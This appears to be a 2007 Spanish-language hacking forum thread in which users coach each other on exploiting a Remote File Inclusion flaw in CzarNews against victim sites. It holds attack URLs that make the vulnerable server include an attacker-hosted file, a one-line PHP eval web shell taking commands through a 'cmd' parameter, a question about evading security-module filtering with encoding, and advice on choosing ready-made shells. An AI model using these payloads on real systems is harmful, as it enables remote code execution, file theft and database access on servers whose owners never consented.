Título: [?] File include Publicado por: Rienzi en 20 Agosto 2007, 13:53 pm Saludos!! me gustaría comprender el funcionamiento del siguiente Exploit!!
http://www.securityfocus.com/bid/12857/exploit Que debería hacer?¿? crear un archivo config en mi host y de ahí enlazarlo de la siguiente manera? http://www.Victima.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.host.org/cn_config.php También me gustaría saber si con esa vulnerabilidad podría cambiar el index o modificarlo un saludo. Título: Re: [?] File include Publicado por: yeikos en 20 Agosto 2007, 14:22 pm Se supone que www.victima.com es el servidor vulnerable al Remote File Inclusion y no tú.
PD: Date una vuelta por Google (http://www.google.es/search?hl=es&q=%22remote+file+inclusion%22&btnG=Buscar&meta=lr%3Dlang_es). Título: Re: [?] File include Publicado por: WannaBeHacker en 20 Agosto 2007, 14:28 pm Citar http://www.example.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.example.org/cn_config.php http://www.example.com/research/news/CzarNewsv113b/news.php?tpath=http://www.example.org/cn_config.php Mmm, se supone que sería así no??? Por ejemplo: http://www.PÁGINAVULNERABLE.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.TUSHELL.org/cn_config.txt? Título: Re: [?] File include Publicado por: Rienzi en 20 Agosto 2007, 14:50 pm pero que tipo de shell debería utilizar? conocen algún tutorial en Español para poder saber mas sobre esta vulnerabilidad ? Que podría hacer con ella??? ya e buscado por google y me aparecen vulns de otros tipos y una pila de cosas en árabe de todas formas probare esta tarde jejeje gracias por vuestra ayuda!!
Título: Re: [?] File include Publicado por: yeikos en 20 Agosto 2007, 14:55 pm En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:
Código
En caso de que el archivo sea un documento de texto bastará con escribirlo sin más: Código Título: Re: [?] File include Publicado por: Rienzi en 20 Agosto 2007, 16:36 pm y una vez con el Exploit listo que utilidad puedo darle?? modificar la configuracion de la web???
Título: Re: [?] File include Publicado por: yeikos en 20 Agosto 2007, 16:54 pm Ejecutar cualquier código PHP en el servidor, o lo que es lo mismo, leer el código fuente de los archivos, poder establecer una conexión con la base de datos, crear/editar/eliminar archivos, etcétera.
Título: Re: [?] File include Publicado por: Distorsion en 20 Agosto 2007, 17:03 pm Aprovecho este post para preguntar una duda. Segun que paginas tienen modulos de seguridad como el php nuke que filtran las peticiones. He probado a ponerlo en ehadecimal en la url el RFI pero lo pilla igual es algo que se tiene en cuenta, la codificacion de caracteres. Sabeis alguna manera de saltarse el filtrado o alguna codificacion poco conocida y no implementada en los modulos de seguridad?¿
Saludos Título: Re: [?] File include Publicado por: Rienzi en 20 Agosto 2007, 17:26 pm ah ok muchisimas gracias , la shell deberia estar en php no? conoces de alguna ya hecha para que me haga mas o menos una idea de como seria la indicada para explotarla?¿
Título: Re: [?] File include Publicado por: yeikos en 20 Agosto 2007, 17:43 pm Citar https://foro.elhacker.net/index.php/topic,174536.0.html Título: Re: [?] File include Publicado por: Rienzi en 20 Agosto 2007, 18:15 pm muchisimas gracias!!!!
Título: Re: [?] File include Publicado por: WannaBeHacker en 20 Agosto 2007, 18:37 pm En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo: Código
En caso de que el archivo sea un documento de texto bastará con escribirlo sin más: Código Pero si se supone que quieres que te funcione una shell por ejemplo , no tedría que ser http://www.example.org/cn_config.txt? ?? Título: Re: [?] File include Publicado por: Rienzi en 20 Agosto 2007, 18:38 pm otra cosa , cual de todas las shells deberia funcionar en dicha vulnerabilidad ?? todas sirvirian? deberia renombrarlas al igual que aparecen en security focus???
es normal que de error 500 al intentar ejecutarla¿? un saludo. Título: Re: [?] File include Publicado por: yeikos en 20 Agosto 2007, 20:38 pm WannaBeHacker, el archivo puede ser n_config.txt, archivo.php o file.html, lo importante es el contenido que contenga el archivo.
Un documento de texto o una página web (html) es lo más directo, porque tan solo tendremos que colocar el código a ejecutar, ya que es texto plano. En cambio si es un archivo PHP tendremos que imprimir como texto el código a incluir, por ejemplo, si archivo.php contiene: Código Obtendremos como resultado la información de nuestro servidor, ya que estaremos ejecutado phpinfo y el resultado de nuestro servidor será incluido en el servidor vulnerable, por lo tanto no estaremos ejecutando nada en dicho servidor. En cambio el siguiente código imprime por pantalla <?php phpinfo(); ?>, que es lo que el servidor vulnerable incluirá mediante la función include/require: Código
Rienzi, las shells, que en realidad no lo son tanto, poseen diversas funciones que nos simplicaran el trabajo, no es necesario que las utilices, puedes crear la tuya, o simplemente ejecutar códigos directos en el servidor si no quieres complicaciones. Título: Re: [?] File include Publicado por: Rienzi en 20 Agosto 2007, 20:57 pm jejeje muchas gracias por responder ahora cuando uso el
Código: <?php me da a descargar el archivo phplines de el servidor creo que puedo descargar cualquier archivo del server mmmm es eso??es que no me apareció config alguna jeje creo que se me escapa algo eso si cuando intento abrir el susodicho ar4chivo del server vulnerable me aparece completamente en blanco (abierto con block de notas). Porcierto de que manera podria enviar comandos directamente? asi www.vulnerable.com/vuln.php?page=http://www.host2.com/archivo.txt?cmd=[comando] ??? Pd: Creo que en vez de descargar archivos lo que hago es crearlos en el server vurln y descargarlos. Título: Re: [?] File include Publicado por: yeikos en 20 Agosto 2007, 21:27 pm Cita de: archivo.txt <?php eval($_GET['cmd']); ?> Revisa los temas anteriores, ya se ha hablado bastante sobre este fallo. Título: Re: [?] File include Publicado por: WannaBeHacker en 20 Agosto 2007, 23:55 pm Yeikos, muchísimas gracias por tu tiempo y tu explicación.
Por cierto, es que a mí este bug también me salto con el SSS hace un tiempo cuando realizé un scan, puede ser que el scan fuera un falso positivo verdad? Porque realizo el RFI y no ocurre nada... O que este fixeado??? Título: Re: [?] File include Publicado por: yeikos en 21 Agosto 2007, 00:09 am Nunca hay que fiarse al 100% de los escáneres, y menos los que van dirigidos a las aplicaciones Web. Si queréis comprobar si son realmente vulnerables hagan las pruebas ustedes mismos asignándo a la variable una URL; si se carga la página Web o se produce un error, posiblemente es vulnerable.
|